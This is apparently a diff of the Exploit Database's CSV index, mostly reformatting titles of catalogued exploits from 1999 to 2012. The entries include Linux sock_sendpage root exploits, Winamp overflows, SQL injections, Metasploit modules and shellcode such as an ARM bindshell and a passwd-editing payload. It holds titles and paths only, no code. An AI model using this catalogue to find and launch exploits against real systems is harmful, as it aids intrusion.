8780,platforms/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 - (.mp3) Local Overflow Exploit",2009-05-26,Nine:Situations:Group,windows,local,0
8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion Vulnerability",2009-05-26,girex,php,webapps,0
8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - (ps_drv.sys) Local Privilege Escalation Exploit",2009-05-26,"NT Internals",windows,local,0
8783,platforms/windows/local/8783.c,"Winamp 5.551 MAKI Parsing Integer Overflow Exploit",2009-05-26,n00b,windows,local,0
8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow Exploit",2009-05-26,n00b,windows,local,0
8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza <= 2.x - (vbplaza.php) Blind SQL Injection Vuln",2009-05-26,"Cold Zero",php,webapps,0
8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET Remote File Disclosure Vulnerability",2009-05-26,Securitylab.ir,asp,webapps,0
8786,platforms/multiple/remote/8786.txt,"Lighttpd < 1.4.23 Source Code Disclosure Vulnerability (BSD/Solaris bug)",2009-05-26,venatir,multiple,remote,0
@ -8900,7 +8900,7 @@ id,file,description,date,author,platform,type,port
9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 (user.ini) Arbitrary Download Vulnerability",2009-08-13,"aBo MoHaMeD",hardware,remote,0
9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload Vulnerability",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0
9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x (xss/sql/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0
9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x - sock_sendpage() Local Ring0 Root Exploit",2009-08-14,spender,linux,local,0
9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x - sock_sendpage() Local Ring0 Root Exploit (1)",2009-08-14,spender,linux,local,0
9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,IRCRASH,php,webapps,0
9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 (competition) SQL Injection Vuln",2009-08-14,Mr.SQL,php,webapps,0
@ -8943,7 +8943,7 @@ id,file,description,date,author,platform,type,port
9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android Edition)",2009-08-18,Zinx,android,local,0
9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4/2.6 - sock_sendpage() ring0 Root Exploit (Simple Version)",2009-08-24,"INetCop Security",linux,local,0
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 - sock_sendpage() ring0 Root Exploit (1)",2009-08-24,"INetCop Security",linux,local,0
9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b (Auth Bypass) Insecure Cookie Handling Vuln",2009-08-24,Mr.tro0oqy,php,webapps,0
@ -9059,7 +9059,7 @@ id,file,description,date,author,platform,type,port
9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0
9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389
9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0
9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (#2)",2009-09-09,"Ramon Valle",linux,local,0
9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0
9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0
9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 (fonctions_racine.php) Remote File Inclusion Vuln",2009-09-09,"EA Ngel",php,webapps,0
9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0
@ -10331,7 +10331,7 @@ id,file,description,date,author,platform,type,port
11264,platforms/windows/local/11264.txt,"South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0
11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0
11266,platforms/windows/dos/11266.pl,"KOL Wave Player 1.0 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0
11267,platforms/windows/local/11267.py,"Winamp 5.572 Exploit - SEH",2010-01-26,TecR0c,windows,local,0
11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit SEH",2010-01-26,TecR0c,windows,local,0
11270,platforms/php/webapps/11270.txt,"Joomla VirtueMart Module Customers_who_bought - SQL Injection Vulnerability",2010-01-27,B-HUNT3|2,php,webapps,0
11271,platforms/php/webapps/11271.txt,"Joomla Component (com_virtuemart) order_status_id SQL Injection Vulnerability",2010-01-27,B-HUNT3|2,php,webapps,0
11272,platforms/windows/remote/11272.py,"CamShot 1.2 - SEH Overwrite Exploit",2010-01-27,tecnik,windows,remote,0
@ -10554,7 +10554,7 @@ id,file,description,date,author,platform,type,port
11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products XML External Entity And XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0
11530,platforms/php/webapps/11530.txt,"Article Friendly SQL Injection Vulnerability",2010-02-22,SkuLL-HackeR,php,webapps,0
11531,platforms/windows/dos/11531.pl,"Windows Media Player 11.0.5721.5145 - (.mpg) Buffer Overflow Exploit",2010-02-22,"cr4wl3r ",windows,dos,0
11532,platforms/windows/dos/11532.html,"Winamp 5.57 (Browser) IE Denial of Service Exploit",2010-02-22,"cr4wl3r ",windows,dos,0
11532,platforms/windows/dos/11532.html,"Winamp 5.57 - (Browser) IE Denial of Service Exploit",2010-02-22,"cr4wl3r ",windows,dos,0
11533,platforms/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - (iso compilation) Local Buffer Invasion PoC",2010-02-22,LiquidWorm,windows,dos,0
11534,platforms/windows/dos/11534.pl,"VKPlayer 1.0 - (.mid) Denial of Service Exploit",2010-02-22,"cr4wl3r ",windows,dos,0
11535,platforms/windows/dos/11535.pl,"Media Player Classic 6.4.9.1 - (.avi) Buffer Overflow Exploit",2010-02-22,"cr4wl3r ",windows,dos,0
@ -11133,7 +11133,7 @@ id,file,description,date,author,platform,type,port
12183,platforms/php/webapps/12183.txt,"Joomla Component com_jdrugstopics SQL Injection Vulnerability",2010-04-12,SadHaCkEr,php,webapps,0
12184,platforms/php/webapps/12184.txt,"Joomla Component com_sermonspeaker SQL Injection Vulnerability",2010-04-12,SadHaCkEr,php,webapps,0
12185,platforms/php/webapps/12185.txt,"Joomla Component com_flexicontent Local File Vulnerability",2010-04-12,eidelweiss,php,webapps,0
12186,platforms/php/webapps/12186.pl,"vBulletin DoS - all version",2010-04-12,"Jim Salim",php,webapps,0
12186,platforms/php/webapps/12186.pl,"vBulletin DoS - All Version",2010-04-12,"Jim Salim",php,webapps,0
12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-12,"cr4wl3r ",php,webapps,0
12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - format string Vulnerability",2010-04-12,"Alexey Sintsov",multiple,dos,0
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
@ -12826,7 +12826,7 @@ id,file,description,date,author,platform,type,port
14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - (.m3u) Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0
14658,platforms/windows/remote/14658.txt,"123 flashchat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote,0
14636,platforms/php/webapps/14636.txt,"Plogger Remote File Disclosure Vulnerability",2010-08-13,Mr.tro0oqy,php,webapps,0
14637,platforms/php/webapps/14637.txt,"Get Tube All Versions SQL Injection Vulnerability",2010-08-13,Mr.P3rfekT,php,webapps,0
14637,platforms/php/webapps/14637.txt,"Get Tube All Versions - SQL Injection Vulnerability",2010-08-13,Mr.P3rfekT,php,webapps,0
14639,platforms/php/webapps/14639.txt,"MailForm 1.2 - Remote File Include",2010-08-13,LoSt.HaCkEr,php,webapps,0
14640,platforms/php/webapps/14640.txt,"ACollab - Multiple Vulnerabilities",2010-08-14,"AmnPardaz ",php,webapps,0
14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal Vulnerability",2010-08-14,Unknown,multiple,remote,0
@ -12943,7 +12943,7 @@ id,file,description,date,author,platform,type,port
14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0
14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0
14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 DLL Hijacking Exploit (iacenc.dll)",2010-08-25,LiquidWorm,windows,local,0
14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 DLL Hijacking Exploit (wnaspi32.dll)",2010-08-25,LiquidWorm,windows,local,0
14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - DLL Hijacking Exploit (wnaspi32.dll)",2010-08-25,LiquidWorm,windows,local,0
14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - DLL Hijacking Exploit (quserex.dll)",2010-08-25,LiquidWorm,windows,local,0
14791,platforms/windows/local/14791.c,"Daemon tools lite DLL Hijacking Exploit (mfc80loc.dll)",2010-08-25,"Mohamed Clay",windows,local,0
14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield <= 1.5.1 - Local/Remote Root Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0
@ -13304,7 +13304,7 @@ id,file,description,date,author,platform,type,port
15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection Vulnerability",2010-10-18,X_AviaTique_X,php,webapps,0
15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 - (.ogg) Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0
15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0
15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
15302,platforms/windows/dos/15302.py,"Spider Player 2.4.5 - Denial of Service Vulnerability",2010-10-22,"MOHAMED ABDI",windows,dos,0
15301,platforms/windows/dos/15301.pl,"Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability",2010-10-21,LiquidWorm,windows,dos,0
@ -13322,7 +13322,7 @@ id,file,description,date,author,platform,type,port
15308,platforms/php/webapps/15308.txt,"Pulse Pro 1.4.3 Persistent XSS Vulnerability",2010-10-24,"Th3 RDX",php,webapps,0
15309,platforms/php/webapps/15309.txt,"DBHcms 1.1.4 - SQL Injection Vulnerability",2010-10-24,ZonTa,php,webapps,0
15310,platforms/php/webapps/15310.py,"Jamb CSRF Arbitrary Add a Post",2010-10-25,Stoke,php,webapps,0
15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (Friendly Version)",2010-10-25,"Mighty-D and 7eK",windows,local,0
15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Stack Overflow",2010-10-25,"Mighty-D and 7eK",windows,local,0
15313,platforms/php/webapps/15313.txt,"Plesk Small Business Manager 10.2.0 and Site Editor - Multiple Vulnerabilities",2010-10-25,"David Hoyt",php,webapps,0
15314,platforms/arm/shellcode/15314.S,"ARM Bindshell port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15315,platforms/arm/shellcode/15315.S,"ARM Bind Connect UDP Port 68",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
@ -13820,7 +13820,7 @@ id,file,description,date,author,platform,type,port
15938,platforms/php/webapps/15938.txt,"axdcms-0.1.1 - Local File Include Vulnerbility",2011-01-08,n0n0x,php,webapps,0
15939,platforms/php/webapps/15939.txt,"Elxis CMS 2009.2 - Remote file include vulnerbility",2011-01-08,n0n0x,php,webapps,0
15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote DoS in RDS Service",2011-01-08,Pepelux,windows,dos,0
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
15943,platforms/php/webapps/15943.txt,"mingle forum (wordpress plugin) <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 - CAP_SYS_ADMIN x86 & x64 - Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
@ -14107,12 +14107,12 @@ id,file,description,date,author,platform,type,port
16303,platforms/multiple/remote/16303.rb,"Opera 9 Configuration Overwrite",2010-07-27,metasploit,multiple,remote,0
16304,platforms/multiple/remote/16304.rb,"Opera historysearch XSS",2010-11-11,metasploit,multiple,remote,0
16305,platforms/multiple/remote/16305.rb,"Java RMIConnectionImpl Deserialization Privilege Escalation Exploit",2010-09-27,metasploit,multiple,remote,0
16306,platforms/windows/remote/16306.rb,"Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution",2010-09-20,metasploit,windows,remote,0
16306,platforms/windows/remote/16306.rb,"Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution",2010-09-20,metasploit,windows,remote,0
16307,platforms/multiple/local/16307.rb,"PeaZip <= 2.6.1 Zip Processing Command Injection",2010-09-20,metasploit,multiple,local,0
16308,platforms/multiple/remote/16308.rb,"Maple Maplet File Creation and Command Execution",2010-09-20,metasploit,multiple,remote,0
16309,platforms/multiple/remote/16309.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",2010-09-20,metasploit,multiple,remote,0
16310,platforms/multiple/remote/16310.rb,"PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,metasploit,multiple,remote,0
16311,platforms/linux/remote/16311.rb,"wu-ftpd SITE EXEC/INDEX Format String Vulnerability",2010-11-30,metasploit,linux,remote,0
16311,platforms/linux/remote/16311.rb,"wu-ftpd - SITE EXEC/INDEX Format String Vulnerability",2010-11-30,metasploit,linux,remote,0
16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,metasploit,multiple,remote,0
16313,platforms/php/webapps/16313.rb,"FreeNAS exec_raw.php Arbitrary Command Execution",2010-11-24,metasploit,php,webapps,0
16314,platforms/multiple/remote/16314.rb,"Sun Java System Web Server WebDAV OPTIONS Buffer Overflow",2010-08-07,metasploit,multiple,remote,0
@ -14332,7 +14332,7 @@ id,file,description,date,author,platform,type,port
16528,platforms/windows/remote/16528.rb,"Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16529,platforms/windows/remote/16529.rb,"WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16530,platforms/windows/remote/16530.rb,"mIRC IRC URL Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16531,platforms/windows/local/16531.rb,"Winamp Playlist UNC Path Computer Name Overflow",2010-04-30,metasploit,windows,local,0
16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow",2010-04-30,metasploit,windows,local,0
16532,platforms/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling",2010-07-03,metasploit,windows,remote,0
16533,platforms/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use After Free",2011-02-08,metasploit,windows,remote,0
16534,platforms/windows/remote/16534.rb,"AtHocGov IWSAlerts ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0
@ -14412,7 +14412,7 @@ id,file,description,date,author,platform,type,port
16608,platforms/windows/remote/16608.rb,"Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0
16610,platforms/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata (in_mp3.dll) - Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16612,platforms/windows/remote/16612.rb,"Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution",2010-09-20,metasploit,windows,remote,0
16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0
16614,platforms/windows/local/16614.rb,"Adobe Flash Player _newfunction_ Invalid Pointer Use",2010-09-20,metasploit,windows,local,0
@ -15014,7 +15014,7 @@ id,file,description,date,author,platform,type,port
17251,platforms/php/webapps/17251.html,"VCalendar 1.1.5 - CSRF Vulnerability",2011-05-06,"High-Tech Bridge SA",php,webapps,0
17252,platforms/windows/remote/17252.rb,"VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow",2011-04-08,metasploit,windows,remote,0
17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal Vulnerability",2011-05-07,"Raffaele Forte",cgi,webapps,0
17264,platforms/php/webapps/17264.txt,"Joomla Component com_versioning SQLi Vulnerability",2011-05-09,the_cyber_nuxbie,php,webapps,0
17264,platforms/php/webapps/17264.txt,"Joomla Component com_versioning - SQLi Vulnerability",2011-05-09,the_cyber_nuxbie,php,webapps,0
17265,platforms/php/webapps/17265.txt,"Joomla Component com_hello SQL Injection Vulnerability",2011-05-09,the_cyber_nuxbie,php,webapps,0
17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0
17267,platforms/php/webapps/17267.txt,"Traidnt UP 2.0 - (view.php) SQL Injection Vulnerability",2011-05-10,ScOrPiOn,php,webapps,0
@ -15860,7 +15860,7 @@ id,file,description,date,author,platform,type,port
18288,platforms/php/webapps/18288.txt,"DIY-CMS blog mod SQL Injection Vulnerability",2011-12-29,snup,php,webapps,0
18290,platforms/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Stored XSS Vulnerability",2011-12-29,G13,php,webapps,0
18291,platforms/hardware/remote/18291.txt,"Reaver WiFi Protected Setup Exploit",2011-12-30,cheffner,hardware,remote,0
18292,platforms/php/webapps/18292.txt,"Dede CMS All Versions SQL Injection Vulnerability",2011-12-30,"CWH and Nafsh",php,webapps,0
18292,platforms/php/webapps/18292.txt,"Dede CMS All Versions - SQL Injection Vulnerability",2011-12-30,"CWH and Nafsh",php,webapps,0
18293,platforms/php/webapps/18293.txt,"Akiva WebBoard 8.x SQL Injection Vulnerability",2011-12-30,"Alexander Fuchs",php,webapps,0
18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 Polymorphic ShellCode - setuid(0)+setgid(0)+add user 'iph' without password to /etc/passwd",2011-12-31,pentesters.ir,lin_x86,shellcode,0
18295,platforms/linux/dos/18295.txt,"lighttpd Denial of Service Vulnerability PoC",2011-12-31,pi3,linux,dos,0
@ -16768,7 +16768,7 @@ id,file,description,date,author,platform,type,port
19374,platforms/linux/local/19374.c,"Debian Linux 2.0/2.0 r5 / FreeBSD <= 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux <= 6.1 - Lsof Buffer Overflow Vulnerability (2)",1999-02-17,Zhodiac,linux,local,0
19383,platforms/multiple/remote/19383.txt,"Qbik WinGate Standard <= 3.0.5 Log Service Directory Traversal Vulnerability",1999-02-22,eEYe,multiple,remote,0
19382,platforms/multiple/dos/19382.txt,"Ipswitch IMail 5.0 Whois32 Daemon Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0
19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion() Vulnerability",1999-03-08,"Fabien Royer",windows,local,0
19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 - ISAPI GetExtensionVersion() Vulnerability",1999-03-08,"Fabien Royer",windows,local,0
19377,platforms/multiple/dos/19377.txt,"Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0
19378,platforms/multiple/dos/19378.txt,"Ipswitch IMail 5.0 LDAP Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0
19379,platforms/multiple/dos/19379.txt,"Ipswitch IMail 5.0 IMonitor Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0
@ -17915,7 +17915,7 @@ id,file,description,date,author,platform,type,port
20591,platforms/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure Vulnerability",2001-01-24,"Security Research Team",multiple,remote,0
20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 JSP/JSPSQL Remote File Reading Vulnerability",2000-01-22,"Georgi Guninski",jsp,remote,0
20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x ipfw Filtering Evasion Vulnerability",2001-01-23,"Aragon Gouveia",freebsd,remote,0
20594,platforms/unix/remote/20594.txt,"Wu-Ftpd 2.4.2/2.5/2.6 Debug Mode Client Hostname Format String Vulnerability",2001-01-23,"Wu-ftpd team",unix,remote,0
20594,platforms/unix/remote/20594.txt,"Wu-Ftpd 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String Vulnerability",2001-01-23,"Wu-ftpd team",unix,remote,0
20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5_Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability",1999-09-25,anonymous,multiple,remote,0
20596,platforms/windows/dos/20596.c,"Microsoft Windows NT 4.0 Networking Mutex DoS Vulnerability",2001-01-24,"Arne Vidstrom",windows,dos,0
20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 lists Command Execution Vulnerability",1994-06-06,"Razvan Dragomirescu",linux,remote,0
@ -18010,7 +18010,7 @@ id,file,description,date,author,platform,type,port
20687,platforms/windows/remote/20687.txt,"OReilly Software WebSite Professional 2.5.4 - Directory Disclosure Vulnerability",2001-03-16,"Roberto Moreno",windows,remote,0
20688,platforms/windows/remote/20688.txt,"Qualcomm Eudora 5.0.2 - 'Use Microsoft Viewer' Code Execution Vulnerability",2001-03-18,http-equiv,windows,remote,0
20689,platforms/cgi/remote/20689.pl,"SWSoft ASPSeek 1.0 s.cgi Buffer Overflow Vulnerability",2001-03-19,teleh0r,cgi,remote,0
20690,platforms/linux/remote/20690.sh,"wu-ftpd 2.4/2.5/2.6_Trolltech ftpd 1.2_ProFTPD 1.2_BeroFTPD 1.3.4 FTP glob Expansion Vulnerability",2001-03-15,"Frank DENIS",linux,remote,0
20690,platforms/linux/remote/20690.sh,"wu-ftpd 2.4/2.5/2.6_Trolltech ftpd 1.2_ProFTPD 1.2_BeroFTPD 1.3.4 FTP - glob Expansion Vulnerability",2001-03-15,"Frank DENIS",linux,remote,0
20691,platforms/linux/local/20691.txt,"FTPFS 0.1.1/0.2.1/0.2.2 mount Buffer Overflow Vulnerability",2001-03-13,"Frank DENIS",linux,local,0
20692,platforms/multiple/remote/20692.pl,"Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)",2001-06-13,rfp,multiple,remote,0
20693,platforms/multiple/remote/20693.c,"Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)",2002-02-21,st0ic,multiple,remote,0
@ -18376,7 +18376,7 @@ id,file,description,date,author,platform,type,port
21082,platforms/multiple/webapps/21082.txt,"novell sentinel log manager <= 1.2.0.1 - Directory Traversal",2011-12-18,"Andrea Fabrizi",multiple,webapps,0
21084,platforms/php/webapps/21084.txt,"ES Job Search Engine 3.0 - SQL Injection Vulnerability",2012-09-05,Vulnerability-Lab,php,webapps,0
21085,platforms/asp/webapps/21085.txt,"Ektron CMS 8.5.0 - Multiple Vulnerabilities",2012-09-05,"Sense of Security",asp,webapps,0
21256,platforms/windows/local/21256.rb,"Winamp MAKI Buffer Overflow",2012-09-12,metasploit,windows,local,0
21256,platforms/windows/local/21256.rb,"Winamp - MAKI Buffer Overflow",2012-09-12,metasploit,windows,local,0
21088,platforms/unix/remote/21088.pl,"AOLServer 3 Long Authentication String Buffer Overflow Vulnerability (1)",2001-08-22,"Nate Haggard",unix,remote,0
21089,platforms/unix/remote/21089.c,"AOLServer 3 Long Authentication String Buffer Overflow Vulnerability (2)",2001-09-05,qitest1,unix,remote,0
21090,platforms/windows/local/21090.txt,"CuteFTP 4.2 Default Weak Password Encoding Vulnerability",2001-08-23,"E. van Elk",windows,local,0
@ -18871,7 +18871,7 @@ id,file,description,date,author,platform,type,port
21592,platforms/unix/local/21592.c,"Sun SunPCi II VNC Software 2.3 Password Disclosure Vulnerability",2002-07-03,"Richard van den Berg",unix,local,0
21593,platforms/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 DoS Amplifier Vulnerability",2002-07-03,"Auriemma Luigi",multiple,dos,0
21594,platforms/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 Malformed TCP Packet Denial of Service Vulnerability",2002-07-04,altomo,windows,dos,0
21595,platforms/windows/remote/21595.c,"Nullsoft Winamp 2.80 Automatic Update Check Buffer Overflow Vulnerability",2002-07-03,anonymous,windows,remote,0
21595,platforms/windows/remote/21595.c,"Nullsoft Winamp 2.80 - Automatic Update Check Buffer Overflow Vulnerability",2002-07-03,anonymous,windows,remote,0
21596,platforms/osx/remote/21596.txt,"MacOS X 10.1.x SoftwareUpdate Arbitrary Package Installation Vulnerability",2002-07-08,"Russell Harding",osx,remote,0
21597,platforms/windows/remote/21597.txt,"Key Focus KF Web Server 1.0.2 - Directory Contents Disclosure Vulnerability",2002-07-08,Securiteinfo.com,windows,remote,0
21598,platforms/linux/local/21598.c,"Linux Kernel 2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability",2002-07-08,"Paul Starzetz",linux,local,0
@ -18896,7 +18896,7 @@ id,file,description,date,author,platform,type,port
21617,platforms/cgi/webapps/21617.txt,"IMHO Webmail 0.9x Account Hijacking Vulnerability",2002-07-15,"Security Bugware",cgi,webapps,0
21618,platforms/windows/remote/21618.txt,"Mirabilis ICQ 2002 Sound Scheme Remote Configuration Modification Vulnerability",2002-07-15,xLaNT,windows,remote,0
21619,platforms/windows/remote/21619.txt,"AOL Instant Messenger 4.x Unauthorized Actions Vulnerability",2002-07-16,orb,windows,remote,0
21620,platforms/cgi/dos/21620.txt,"Oddsock Song Requester 2.1 WinAmp Plugin Denial of Service Vulnerability",2002-07-16,"Lucas Lundgren",cgi,dos,0
21620,platforms/cgi/dos/21620.txt,"Oddsock Song Requester 2.1 - WinAmp Plugin Denial of Service Vulnerability",2002-07-16,"Lucas Lundgren",cgi,dos,0
21621,platforms/jsp/webapps/21621.txt,"Macromedia Sitespring 1.2 Default Error Page Cross-Site Scripting Vulnerability",2002-07-17,"Peter Gründl",jsp,webapps,0
21622,platforms/php/webapps/21622.txt,"PHP-Wiki 1.2/1.3 - Cross-Site Scripting Vulnerability",2002-07-17,Pistone,php,webapps,0
